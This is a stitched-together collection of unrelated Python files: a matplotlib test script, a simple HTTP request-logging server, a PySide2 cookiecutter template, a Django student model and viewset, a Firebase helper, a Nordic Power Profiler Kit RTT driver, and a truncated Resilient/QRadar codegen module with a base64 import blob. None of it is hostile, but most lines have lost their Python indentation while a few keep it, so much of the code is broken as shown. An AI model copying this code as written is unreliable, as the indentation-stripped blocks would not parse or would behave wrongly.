# print(example_output)
##-- Testing Matplotlib
length= 1
width = 4
plt.rcParams["figure.figsize"] = [7, 5]
plt.rcParams["figure.autolayout"] = True
figure, ax = plt.subplots(1)
rectangle = [ x for x in range(7)]
for i in range(len(rectangle)):
if i%2 ==0:
rectangle[i] = patches.Rectangle((i, 1), 1, 1, edgecolor='orange', facecolor="red", linewidth=1)
else:
rectangle[i] = patches.Rectangle((i, 1), 1, 1, edgecolor='orange', facecolor="green", linewidth=0)
# rectangle[1] = patches.Rectangle((4, 4), 1, 1, edgecolor='orange',
# facecolor="green", linewidth=7)
# rectangle[0] = patches.Rectangle((1, 2), 1, 1, edgecolor='green', facecolor='orange', linewidth= 5)
ax.plot([2, 4, 5, 1, 4, 8, 0], c='red')
for point in rectangle:
ax.add_patch(point)
# print(np.log(0))
a = np.array([True, False, True])
# print(a)
b = a*1
# print(b)
# plt.show()
X, y = spiral_data(samples=100, classes=5)
# print(X, y)
for point, classes in zip(X,y):
pass
if classes==0:
plt.scatter(point[0],point[1], color='red')
if classes==1:
plt.scatter(point[0],point[1], color='blue')
if classes==2:
plt.scatter(point[0],point[1], color='green')
if classes==3:
plt.scatter(point[0],point[1], color='yellow')
if classes==4:
plt.scatter(point[0],point[1], color='purple')
# plt.show()
for x,y in zip([1,2,3,1,2,3,1,2,3],[1,1,1,2,2,2,3,3,3]):
plt.scatter(x,y,color = (x/3, y/3, 0))
# plt.show()
example = np.array([[1, 2], [3, 4]])
flattened = example.reshape(-1)
# print(example)
# print(example.shape)
# print(flattened)
# print(flattened.shape)
weights = np.random.randn(2, 4)
inputs = np.random.randn(6,2)
output = [[0 for x in range(len(weights[1]))] for x in range(len(inputs))]
for i_batch in range(len(output)): # Batch
for j_neuron in range(len(output[i_batch])): # Neuron
count = 0
for k_input in range(len(weights)):
count += weights[k_input][j_neuron]*inputs[i_batch][k_input]
output[i_batch][j_neuron] = count
print(output)
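# Illustrative check (numpy only): the triple loop above is just a matrix
# product, so the same values come from np.dot(inputs, weights), e.g.
# print(np.allclose(output, np.dot(inputs, weights)))  # True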
# --##
|
#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [ssl]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
import ssl
class ServerHandler(BaseHTTPRequestHandler):
def _set_response(self, code):
self.send_response(code)
self.send_header('Content-type', 'text/html')
self.end_headers()
response = '{"id": "0","text": "TestResponse"}'
self.wfile.write(bytes(response, 'utf-8'))
def do_GET(self):
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
self._set_response(200)
def do_POST(self):
content_length = int(self.headers['Content-Length'])
with open("written_data.txt", "a") as output_file:
post_data = self.rfile.read(content_length).decode('utf-8')
str_data = str(post_data + "\n")
output_file.write(str_data)
self._set_response(200)
def run(server_class=HTTPServer, handler_class=ServerHandler, port=4480, useSsl = False):
logging.basicConfig(level=logging.INFO)
server_address = ('0.0.0.0', port)
httpd = server_class(server_address, handler_class)
    if useSsl:
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.load_cert_chain(certfile="./wasp.pem")
        httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
logging.info('Starting http server listening on port ' + str(port) + "\n")
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
logging.info('Stopping httpd...\n')
if __name__ == '__main__':
from sys import argv
if len(argv) == 2:
run(useSsl=(argv[1] == "ssl"))
else:
run()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from PySide2 import QtCore, QtWidgets
from {{cookiecutter.repo_name}}_ui import Ui_MainWindow
__version__ = "{{cookiecutter.version}}"
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
@QtCore.Slot()
def on_action_exit_triggered(self):
self.close()
@QtCore.Slot()
def on_action_about_triggered(self):
about_text = "<br>".join([f"<b>{{cookiecutter.repo_name}}</b> V{__version__}", "", "This is a PySide2 application."])
QtWidgets.QMessageBox.about(self, "About", about_text)
@QtCore.Slot()
def on_push_button_clicked(self):
self.ui.status_bar.showMessage("Popping up an informative message box...")
QtWidgets.QMessageBox.information(self, "Button clicked", "You clicked the button...")
self.ui.status_bar.clearMessage()
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
import os
from os import listdir
from os.path import isfile, join
import json
mypath = r'D:\data\smiles'
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f)) and f.startswith('SMILE_')]
counter_all = 0
file_counter = 0
FULL_URI_LIST = []
with open('FULL_URI_LIST', 'w') as f:
    f.write('')
for file in onlyfiles:
file_counter = file_counter + 1
print(file_counter, 'out of', len(onlyfiles))
with open(os.path.join(mypath, file)) as f:
obj = json.loads(f.read())
for item in obj:
counter_all = counter_all + 1
URI = item['species'] # get the uri
        with open('FULL_URI_LIST', 'a') as f2:
            f2.write(URI)
            f2.write('\n')
with open('FULL_URI_LIST', encoding='utf-8') as f:
    FULL_URI_LIST = f.readlines()
FULL_URI_LIST = list(set(FULL_URI_LIST))
with open('FULL_URI_LIST', 'w') as f:
    f.write(json.dumps(FULL_URI_LIST, indent=4))
|
# -*- coding: utf-8 -*-
from allink_core.core.models.managers import AllinkCategoryModelQuerySet
class PartnerQuerySet(AllinkCategoryModelQuerySet):
pass
PartnerManager = PartnerQuerySet.as_manager
|
#!/usr/bin/env python3
################################################################################
### cif2xyz file converter based on openbabel, script by RS ####################
################################################################################
import sys
import os
import subprocess
def float_w_braces(num):
num = num.split('(')[0]
return float(num)
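# e.g. float_w_braces("12.345(6)") -> 12.345: CIF numbers may carry a standard
# uncertainty in parentheses, which is stripped before conversion.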
name = sys.argv[1]
if len(sys.argv)>2:
outname = sys.argv[2]
else:
outname = name[:-4]+".txyz"
tempname = "temp.xyz"
try:
subprocess.call(["obabel", '-icif', name, '-oxyz', '-O'+tempname, '-UCfill', 'keepconnect'])
except OSError:
raise OSError("install openbabel - Chemical toolbox utilities (cli)")
# read cif to get cell params
f = open(name, "r")
line = f.readline()
cell = {}
while len(line)>0:
sline = line.split()
if len(sline)>1:
keyw = sline[0]
value = sline[1]
if keyw[:12] == "_cell_length":
cell[keyw[13]] = float_w_braces(value)
if keyw[:11] == "_cell_angle":
cell[keyw[12:]] = float_w_braces(value)
line = f.readline()
f.close()
cellparams = "%10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % (cell["a"], cell["b"], cell["c"], cell["alpha"], cell["beta"], cell["gamma"])
try:
subprocess.call(["x2x", "-i", tempname ,"-o", outname, "-c", cellparams])
except OSError:
raise OSError("get x2x from molsys repo")
finally:
os.remove(tempname)
|
from django.db import models
from school_backend.models.school import School
from django.core.exceptions import ValidationError
import uuid
from rest_framework import serializers, viewsets
## Refuse new students if the limit has been reached
def restrict_amount(value):
if Student.objects.filter(school=value).count() >= value.max_student_nb:
raise ValidationError(
'School already has maximal amount of students ' + str(value.max_student_nb))
class Student(models.Model):
first_name = models.CharField(max_length=20)
last_name = models.CharField(max_length=20)
student_identification = models.UUIDField(
default=uuid.uuid4, editable=False)
school = models.ForeignKey(
School, on_delete=models.CASCADE, validators=(restrict_amount, ))
# Serializers define the API representation.
class StudentSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Student
fields = ['first_name', 'last_name',
'student_identification', 'school']
# ViewSets define the view behavior.
## Retrieves all students if there is no param; otherwise retrieves the school's students. If the school does not exist => error
class StudentViewSet(viewsets.ModelViewSet):
queryset = Student.objects.all().select_related('school')
serializer_class = StudentSerializer
def get_queryset(self, *args, **kwargs):
school_id = self.kwargs.get("school_pk")
if school_id is None :
return Student.objects.all()
try:
school = School.objects.get(id=school_id)
except School.DoesNotExist:
raise ValidationError('A school with this id does not exist')
return self.queryset.filter(school=school)
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import firebase
import utils
# Set-up logging
logger = utils.get_logger("lights.monitor")
def save_new_state(ext_id, new_state):
logger.info('Saving new state. ext_id: [%s], new_state: [%s]', ext_id, new_state)
doc_ref = firebase.get_lights().document(ext_id)
doc_ref.set({
firebase.F_STATUS: new_state,
firebase.F_LAST_UPDATE: time.time(),
})
logger.debug('Finished saving new state')
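# Usage sketch (hypothetical identifiers and state values):
#
# save_new_state('light-42', 'ON')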
|
"""
Handles communication with Nordic Power Profiler Kit (PPK) hardware
using Segger's Real-Time Transfer functionality.
"""
import time
import struct
import re
import math
class PPKError(Exception):
"""PPK exception class, inherits from the built-in Exception class."""
def __init__(self, error=None):
"""Constructs a new object and sets the error."""
self.error = error
err_str = 'PPK error: {}'.format(self.error)
Exception.__init__(self, err_str)
class RTTCommand():
"""RTT command opcodes."""
TRIG_SET = 0x01
TRIG_WINDOW_SET = 0x03
TRIG_SINGLE_SET = 0x05
AVERAGE_START = 0x06
AVERAGE_STOP = 0x07
TRIG_STOP = 0x0A
DUT_TOGGLE = 0x0C
REGULATOR_SET = 0x0D
VREF_LO_SET = 0x0E
VREF_HI_SET = 0x0F
EXT_TRIG_IN_TOGGLE = 0x11
RES_USER_SET = 0x12
RES_USER_CLEAR = 0x13
SPIKE_FILTER_ON = 0x15
SPIKE_FILTER_OFF = 0x16
class API():
    """The PPK API manages the RTT connection to the PPK: reading average
    current consumption, starting and stopping measurements, and so on.
    """
ADC_SAMPLING_TIME_US = 13
SAMPLES_PER_AVERAGE = 10
AVERAGE_TIME_US = (SAMPLES_PER_AVERAGE * ADC_SAMPLING_TIME_US)
TRIGGER_SAMPLES_PER_SECOND = (1e6 / ADC_SAMPLING_TIME_US)
AVERAGE_SAMPLES_PER_SECOND = (1e6 / AVERAGE_TIME_US)
EXT_REG_MIN_MV = 2100
EXT_REG_MAX_MV = 3600
TRIG_WINDOW_MIN_US = 1000
TRIG_WINDOW_MAX_US = 52000
RTT_CHANNEL_INDEX = 0
RTT_READ_BUF_LEN = 500
PPK_CMD_WRITE_DELAY = 0.25
def __init__(self, nrfjprog_api, logprint=True):
"""A stateful interface to a Nordic Power Profiler Kit."""
self.nrfjprog_api = nrfjprog_api
self.logprint = logprint
self._connected = False
self._ext_trig_enabled = False
self._vdd = None
self._metadata = None
self._resistors = None
def connect(self):
"""Connect to the PPK and gather metadata."""
self.nrfjprog_api.sys_reset()
self.nrfjprog_api.go()
self.nrfjprog_api.rtt_start()
while not self.nrfjprog_api.rtt_is_control_block_found():
continue
# Allow the PPK firmware to start.
time.sleep(0.9)
metadata = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX, self.RTT_READ_BUF_LEN)
self._metadata = self._parse_metadata(metadata)
self._log(self._metadata)
self._vdd = int(self._metadata["VDD"])
if self._metadata['USER_R1']:
self._resistors = [float(self._metadata['USER_R1']),
float(self._metadata['USER_R2']),
float(self._metadata['USER_R3'])]
else:
self._resistors = [float(self._metadata['R1']),
float(self._metadata['R2']),
float(self._metadata['R3'])]
self._log("Resistors: LO: %s, MID: %s, HI: %s" % (self._resistors[0],
self._resistors[1],
self._resistors[2]))
self._connected = True
def reset_connection(self):
"""Stop RTT, flush it, and then connect to the PPK again."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self.nrfjprog_api.rtt_stop()
self._flush_rtt()
self.connect()
def get_metadata(self):
"""Return a copy of the PPK metadata that is read at the start of the connection."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
return self._metadata.copy()
def enable_dut_power(self):
"""Turn DUT power on."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("DUT power on.")
self._write_ppk_cmd([RTTCommand.DUT_TOGGLE, 1])
def disable_dut_power(self):
"""Turn DUT power off."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("DUT power off.")
self._write_ppk_cmd([RTTCommand.DUT_TOGGLE, 0])
def clear_user_resistors(self):
"""Clear user resistors."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Clearing user resistors.")
self._resistors = [float(self._metadata['R1']),
float(self._metadata['R2']),
float(self._metadata['R3'])]
self._write_ppk_cmd([RTTCommand.RES_USER_CLEAR])
def set_user_resistors(self, user_r1, user_r2, user_r3):
"""Set USER_R1, USER_R2, and USER_R3 resistors. Values should
be floats and will be packed into four bytes.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Set user resistors: %.3f, %.3f, %.3f." % (user_r1, user_r2, user_r3))
self._resistors = [user_r1, user_r2, user_r3]
cmd = [RTTCommand.RES_USER_SET]
cmd.extend(struct.pack('f', user_r1))
cmd.extend(struct.pack('f', user_r2))
cmd.extend(struct.pack('f', user_r3))
self._write_ppk_cmd(cmd)
def enable_spike_filtering(self):
"""Enable spike filtering feature.
When this is turned on, the PPK software will filter data directly
after an automatic range switch. This will limit unwanted spikes
due to rapid switching, but may also remove short current spikes
that might be of significance.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Enabling spike filtering.")
self._write_ppk_cmd([RTTCommand.SPIKE_FILTER_ON])
def disable_spike_filtering(self):
"""Disable spike filtering feature."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Disabling spike filtering.")
self._write_ppk_cmd([RTTCommand.SPIKE_FILTER_OFF])
def set_external_reg_vdd(self, vdd):
"""Set VDD of external voltage regulator.
This is only recommended when using an external DUT (i.e. not the DK with a PPK
sitting on top of it). The DUT should be powered via the 'External DUT' pins.
The 'DUT Select' switch should be set to 'External'. The 'Power Select'
switch should be set to 'Reg.'.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Setting external regulator VDD to %d." % vdd)
# Setting voltages above or below these values can cause the emu connection to stall.
if (self.EXT_REG_MIN_MV > vdd) or (self.EXT_REG_MAX_MV < vdd):
raise PPKError("Invalid vdd given to set_external_reg_vdd: (%d)." % vdd)
vdd_high_byte = vdd >> 8
vdd_low_byte = vdd & 0xFF
self._write_ppk_cmd([RTTCommand.REGULATOR_SET, vdd_high_byte, vdd_low_byte])
self._vdd = vdd
def set_trigger_window(self, time_us):
"""Set the trigger window. This is the dataset transferred
upon every trigger from the PPK.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Set trigger window to %dus." % time_us)
if (self.TRIG_WINDOW_MIN_US > time_us) or (self.TRIG_WINDOW_MAX_US < time_us):
raise PPKError("Invalid time_us given to set_trigger_window: (%d)." % time_us)
window = int(time_us / self.ADC_SAMPLING_TIME_US)
high = (window >> 8) & 0xFF
low = window & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_WINDOW_SET, high, low])
def measure_average(self, time_s, discard_jitter_count=500):
"""Collect time_s worth of average measurements and return
the average along with the list of measurements.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_average(%d, %d)." % (time_s, discard_jitter_count))
samples_count = (time_s * self.AVERAGE_SAMPLES_PER_SECOND)
ppk_helper = PPKDataHelper()
self._start_average_measurement()
while True:
self._read_and_parse_ppk_data(ppk_helper)
collected_buffs = len(ppk_helper)
self._log("Collecting samples: %d" % collected_buffs, end='\r')
if samples_count <= collected_buffs:
break
self._log('')
self._stop_average_measurement()
self._flush_rtt()
# Only one (timestamp, avg_data) tuple is expected here.
ts, avg_buf = ppk_helper.get_average_buffs()[0]
timestamped_buf = [(ts + self.AVERAGE_TIME_US * i, avg_buf[i])
for i in range(discard_jitter_count, len(avg_buf))]
return (self.favg(avg_buf[discard_jitter_count:]), timestamped_buf)
def measure_average_long_time(self, time_s):
"""Calculates average without storing all the values in memory.
Suitable for long time measurement.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_long_average(%d)." % time_s)
ppk_helper = PPKDataHelper()
end_time = time.time() + time_s
accumulated_samples = 0.0
number_samples = 0
self._start_average_measurement()
while True:
self._read_and_parse_ppk_data(ppk_helper)
for pkt in ppk_helper:
if ppk_helper.is_average_pkt(pkt):
sample = ppk_helper.unpack_average(pkt)
accumulated_samples += sample
number_samples += 1
self._log("Current value: %.2f" % sample, end='\r')
if time.time() > end_time:
break
self._log('')
self._stop_average_measurement()
self._flush_rtt()
avg = accumulated_samples / number_samples
return avg
def measure_triggers(self, window_time_us, level_ua, count=1):
"""Collect count trigger buffers."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_triggers(%r, %r, %r)." % (window_time_us, level_ua, count))
self.set_trigger_window(window_time_us)
if count == 1:
self._set_single_trigger(level_ua)
else:
self._set_trigger(level_ua)
return self._measure_triggers(count)
def measure_external_triggers(self, window_time_us, count=1):
"""Wait for the 'TRIG IN' pin before capturing trigger buffers."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_external_triggers(%r, %r)." % (window_time_us, count))
self.set_trigger_window(window_time_us)
self._enable_ext_trigger_in()
return self._measure_triggers(count)
def _measure_triggers(self, count=1):
"""Wait until count trigger buffers are received."""
ppk_helper = PPKDataHelper()
samples_count = count * 2
while True:
self._read_and_parse_ppk_data(ppk_helper)
collected_buffs = len(ppk_helper)
self._log("Collecting trigger buffers: %d" % (collected_buffs/2), end='\r')
if samples_count <= collected_buffs:
break
self._log('')
if self._ext_trig_enabled:
self._disable_ext_trigger_in()
else:
self._stop_trigger()
self._flush_rtt()
result = []
for ts, trig_buf in ppk_helper.get_trigger_buffs(*self._resistors):
timestamped_buf = [(ts + self.ADC_SAMPLING_TIME_US * i, trig_buf[i])
for i in range(0, len(trig_buf))]
result.append((self.favg(trig_buf), timestamped_buf))
return result
def _enable_ext_trigger_in(self):
"""Enable the 'TRIG IN' external trigger.
The external trigger is used in place of the normal TRIG_SET
and TRIG_SINGLE_SET commands.
"""
self._log("Enable 'TRIG IN' external trigger.")
if not self._ext_trig_enabled:
self._write_ppk_cmd([RTTCommand.EXT_TRIG_IN_TOGGLE])
self._ext_trig_enabled = True
def _disable_ext_trigger_in(self):
"""Disable the 'TRIG IN' external trigger."""
self._log("Disable 'TRIG IN' external trigger.")
if self._ext_trig_enabled:
self._write_ppk_cmd([RTTCommand.EXT_TRIG_IN_TOGGLE])
self._ext_trig_enabled = False
def _start_average_measurement(self):
"""Start generating average current measurements."""
self._log("Starting average measurement.")
self._write_ppk_cmd([RTTCommand.AVERAGE_START])
def _stop_average_measurement(self):
"""Stop generating average current measurements."""
self._log("Stopping average measurement.")
self._write_ppk_cmd([RTTCommand.AVERAGE_STOP])
def _set_trigger(self, level_ua):
"""Set the trigger level.
The level_ua parameter is the current draw (in microamps) that
will activate the trigger. To convert from milliamps simply
multiply by 1000.
"""
self._log("Set trigger to %duA." % level_ua)
high = (level_ua >> 16) & 0xFF
mid = (level_ua >> 8) & 0xFF
low = level_ua & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_SET, high, mid, low])
def _set_single_trigger(self, level_ua):
"""Set the single trigger level.
The level_ua parameter is the current draw (in microamps) that
will activate the trigger. To convert from milliamps simply
multiply by 1000.
"""
self._log("Set single trigger to %duA." % level_ua)
high = (level_ua >> 16) & 0xFF
mid = (level_ua >> 8) & 0xFF
low = level_ua & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_SINGLE_SET, high, mid, low])
def _stop_trigger(self):
"""Disable trigger buffer generation."""
self._log("Stopping trigger.")
self._write_ppk_cmd([RTTCommand.TRIG_STOP])
def _write_ppk_cmd(self, byte_array):
"""Adds escape characters to byte_array and then writes it to RTT."""
self.nrfjprog_api.rtt_write(self.RTT_CHANNEL_INDEX,
PPKDataHelper.encode(byte_array),
encoding=None)
def _read_and_parse_ppk_data(self, ppk_data_helper):
"""Read bytes from the RTT channel and pass them to a PPKDataHelper.
Read [zero, RTT_READ_BUF_LEN] bytes from the RTT channel and use the
helper to decode them.
"""
byte_array = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX,
self.RTT_READ_BUF_LEN,
encoding=None)
for byte in byte_array:
ppk_data_helper.decode(byte)
def _flush_rtt(self):
"""Read and discard any available RTT bytes."""
while True:
flush_bytes = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX,
self.RTT_READ_BUF_LEN,
encoding=None)
if not flush_bytes:
break
def _log(self, logstring, **kwargs):
"""Print lof information only when logprint was set to True in __ini__."""
if self.logprint:
print(logstring, **kwargs)
@staticmethod
def favg(float_seq):
"""Return the average of a sequence of floats."""
f_sum = math.fsum(float_seq)
return f_sum / len(float_seq)
@staticmethod
def _parse_metadata(metadata_str):
"""Use a Regular Expression to parse a metadata packet."""
metadata_fields = ("VERSION", "CAL", "R1", "R2", "R3", "BOARD_ID",
"USER_R1", "USER_R2", "USER_R3", "VDD", "HI", "LO")
re_string = ('').join([
'VERSION\\s*([^\\s]+)\\s*CAL:\\s*(\\d+)\\s*',
'(?:R1:\\s*([\\d.]+)\\s*R2:\\s*([\\d.]+)\\s*R3:\\s*',
'([\\d.]+))?\\s*Board ID\\s*([0-9A-F]+)\\s*',
'(?:USER SET\\s*R1:\\s*([\\d.]+)\\s*R2:\\s*',
'([\\d.]+)\\s*R3:\\s*([\\d.]+))?\\s*',
'Refs\\s*VDD:\\s*(\\d+)\\s*HI:\\s*(\\d.+)\\s*LO:\\s*(\\d+)',
])
result = re.split(re_string, metadata_str)[1:]
metadata = {metadata_fields[i]:result[i] for i in range(0, len(metadata_fields))}
return metadata
class PPKDataHelper():
"""Encodes and decodes PPK byte arrays.
Encodes byte arrays via a class function. Decoding is a stateful
operation so an object must be instantiated. Decoded packets can
be retrieved as a list or iterated over.
"""
STX_BYTE = 0x02
ETX_BYTE = 0x03
ESC_BYTE = 0x1F
MODE_RECV = 1
MODE_ESC_RECV = 2
AVERAGE_PKT_LEN = 4
TIMESTAMP_PKT_LEN = 5
# Trigger buffer values consist of pairs of two bytes that get packed
# into a u16 with the top two bits encoding the "measurement range".
# The measurement range is defined by the R1, R2, R3 resistors or
# their USER replacements.
MEAS_RANGE_POS = 14
MEAS_RANGE_MSK = (3 << 14)
MEAS_RANGE_LO = 1
MEAS_RANGE_MID = 2
MEAS_RANGE_HI = 3
MEAS_ADC_POS = 0
MEAS_ADC_MSK = 0x3FFF
ADC_REF = 0.6
ADC_GAIN = 4.0
ADC_MAX = 8192.0
ADC_MULT = (ADC_REF / (ADC_GAIN * ADC_MAX))
def __init__(self):
"""Creates an empty object for parsing bytes."""
self._read_mode = self.MODE_RECV
self._buf = []
self._decoded = []
def __iter__(self):
return self
def __next__(self):
if not self._decoded:
raise StopIteration
else:
return self._decoded.pop(0)
def __len__(self):
return len(self._decoded)
def decode(self, byte):
"""Decode a single byte from the PPK.
Return True if the byte completes the decoding of a packet.
"""
if self.MODE_RECV == self._read_mode:
if self.ESC_BYTE == byte:
self._read_mode = self.MODE_ESC_RECV
elif self.ETX_BYTE == byte:
self._decoded.append(self._buf.copy())
self._buf.clear()
self._read_mode = self.MODE_RECV
return True
else:
self._buf.append(byte)
elif self.MODE_ESC_RECV == self._read_mode:
self._buf.append(byte ^ 0x20)
self._read_mode = self.MODE_RECV
return False
def get_decoded(self):
"""Return the list of decoded packets."""
return self._decoded
def get_average_buffs(self):
"""Return a list of parsed (timestamp, avg_data) tuples.
Every series of average measurements starts with a timestamp.
"""
result = []
ts = None
buf = None
for i in range(0, len(self._decoded)):
if self.is_timestamp_pkt(self._decoded[i]):
if ts and buf:
result.append((ts, buf[:]))
ts = self.unpack_timestamp(self._decoded[i])
buf = []
elif self.is_average_pkt(self._decoded[i]):
if ts:
buf.append(self.unpack_average(self._decoded[i]))
if ts and buf:
result.append((ts, buf[:]))
return result
def get_trigger_buffs(self, meas_res_lo, meas_res_mid, meas_res_hi):
"""Return a list of parsed (timestamp, trig_data) tuples.
Every buffer of trigger data is preceded by a timestamp.
"""
result = []
ts = None
for i in range(0, len(self._decoded)):
if self.is_timestamp_pkt(self._decoded[i]):
ts = self.unpack_timestamp(self._decoded[i])
elif self.is_trigger_pkt(self._decoded[i]):
if ts:
buf = self._decoded[i]
u16s = [self.make_u16(buf[x], buf[x+1]) for x in range(0, len(buf), 2)]
scaled = [self.scale_trigger_value(b, meas_res_lo, meas_res_mid, meas_res_hi)
for b in u16s]
result.append((ts, scaled))
ts = None
else:
ts = None
return result
def reset(self):
"""Clear the state of the object."""
self._read_mode = self.MODE_RECV
self._buf = []
self._decoded = []
@classmethod
def encode(cls, byte_array):
"""Return a byte array with added PPK escape characters."""
buf = []
buf.append(cls.STX_BYTE)
for byte in byte_array:
if byte in (cls.STX_BYTE, cls.ETX_BYTE, cls.ESC_BYTE):
buf.append(cls.ESC_BYTE)
buf.append(byte ^ 0x20)
else:
buf.append(byte)
buf.append(cls.ETX_BYTE)
return buf
@classmethod
def is_average_pkt(cls, byte_array):
"""Return True if byte_array appears to contain average data."""
return cls.AVERAGE_PKT_LEN == len(byte_array)
@classmethod
def is_timestamp_pkt(cls, byte_array):
"""Return True if byte_array appears to contain timestamp data."""
return cls.TIMESTAMP_PKT_LEN == len(byte_array)
@classmethod
def is_trigger_pkt(cls, byte_array):
"""Return True if byte_array appears to contain trigger data."""
return not cls.is_average_pkt(byte_array) and not cls.is_timestamp_pkt(byte_array)
@classmethod
def scale_trigger_value(cls, u16_value, meas_res_lo, meas_res_mid, meas_res_hi):
"""Decode a u16's measurement range and then scale it."""
meas_range = (u16_value & cls.MEAS_RANGE_MSK) >> cls.MEAS_RANGE_POS
divisor = None
if meas_range == cls.MEAS_RANGE_LO:
divisor = meas_res_lo
elif meas_range == cls.MEAS_RANGE_MID:
divisor = meas_res_mid
elif meas_range == cls.MEAS_RANGE_HI:
divisor = meas_res_hi
else:
raise PPKError("Invalid measurement range in trigger buffer: %d" % meas_range)
return (u16_value & cls.MEAS_ADC_MSK) * (cls.ADC_MULT / divisor) * 1e6
@staticmethod
def unpack_average(byte_array):
"""Decode the four bytes in byte_array into a float."""
return struct.unpack('<f', bytearray(byte_array))[0]
@staticmethod
def unpack_timestamp(byte_array):
"""Decode the first four bytes in byte_array and return a u32."""
return struct.unpack('<I', bytearray(byte_array[:4]))[0]
@staticmethod
def make_u16(low_byte, high_byte):
"""Combine two bytes into a u16."""
return (high_byte << 8) + low_byte
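# Usage sketch (hypothetical; assumes an already-opened pynrfjprog-style API object):
#
# ppk = API(nrfjprog_api, logprint=True)
# ppk.connect()
# ppk.enable_dut_power()
# average, samples = ppk.measure_average(5)
# print("Average current: %.2f uA" % average)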
|
# -*- coding: utf-8 -*-
"""Generate the Resilient customizations required for fn_qradar_asset"""
from __future__ import print_function
from resilient_circuits.util import *
def codegen_reload_data():
"""Parameters to codegen used to generate the fn_qradar_asset package"""
reload_params = {"package": u"fn_qradar_asset",
"incident_fields": [],
"action_fields": [],
"function_params": [u"incident_id"],
"datatables": [u"qradar_asset_results"],
"message_destinations": [u"qradar"],
"functions": [u"qradar_asset_query"],
"phases": [],
"automatic_tasks": [],
"scripts": [],
"workflows": [u"example_qradar_asset_search"],
"actions": [u"Example: QRadar Query"]
}
return reload_params
def customization_data(client=None):
"""Produce any customization definitions (types, fields, message destinations, etc)
that should be installed by `resilient-circuits customize`
"""
# This import data contains:
# Function inputs:
# incident_id
# DataTables:
# qradar_asset_results
# Message Destinations:
# qradar
# Functions:
# qradar_asset_query
# Workflows:
# example_qradar_asset_search
# Rules:
# Example: QRadar Query
yield ImportDefinition(u"""
eyJ0YXNrX29yZGVyIjogW10sICJ3b3JrZmxvd3MiOiBbeyJ1dWlkIjogIjJiMTNhZDcyLTM4YmYt
NGIzNi1hZDM2LTZjZjhhMGM3Yzk4NCIsICJkZXNjcmlwdGlvbiI6ICJUaGlzIHdvcmtmbG93IGRl
bW9uc3RyYXRlcyB0aGUgYWJpbGl0eSB0byBydW4gdGhlIFFSYWRhciBmdW5jdGlvbiB3aGljaCBp
ZGVudGlmaWVzIHRlY2huaWNhbCBuYW1lIGFuZCBjb250YWN0IGluZm9ybWF0aW9uIGZyb20gYW4g
YXNzZXQgYW5kIGFkZHMgaXQgdG8gYSBkYXRhIHRhYmxlIGluIHRoZSBpbmNpZGVudC4iLCAib2Jq
ZWN0X3R5cGUiOiAiaW5jaWRlbnQiLCAiZXhwb3J0X2tleSI6ICJleGFtcGxlX3FyYWRhcl9hc3Nl
dF9zZWFyY2giLCAid29ya2Zsb3dfaWQiOiAxNTQsICJsYXN0X21vZGlmaWVkX2J5IjogImdlcmFs
ZC50cm90bWFuQGlibS5jb20iLCAiY29udGVudCI6IHsieG1sIjogIjw/eG1sIHZlcnNpb249XCIx
LjBcIiBlbmNvZGluZz1cIlVURi04XCI/PjxkZWZpbml0aW9ucyB4bWxucz1cImh0dHA6Ly93d3cu
b21nLm9yZy9zcGVjL0JQTU4vMjAxMDA1MjQvTU9ERUxcIiB4bWxuczpicG1uZGk9XCJodHRwOi8v
d3d3Lm9tZy5vcmcvc3BlYy9CUE1OLzIwMTAwNTI0L0RJXCIgeG1sbnM6b21nZGM9XCJodHRwOi8v
d3d3Lm9tZy5vcmcvc3BlYy9ERC8yMDEwMDUyNC9EQ1wiIHhtbG5zOm9tZ2RpPVwiaHR0cDovL3d3
dy5vbWcub3JnL3NwZWMvREQvMjAxMDA1MjQvRElcIiB4bWxuczpyZXNpbGllbnQ9XCJodHRwOi8v
cmVzaWxpZW50LmlibS5jb20vYnBtblwiIHhtbG5zOnhzZD1cImh0dHA6Ly93d3cudzMub3JnLzIw
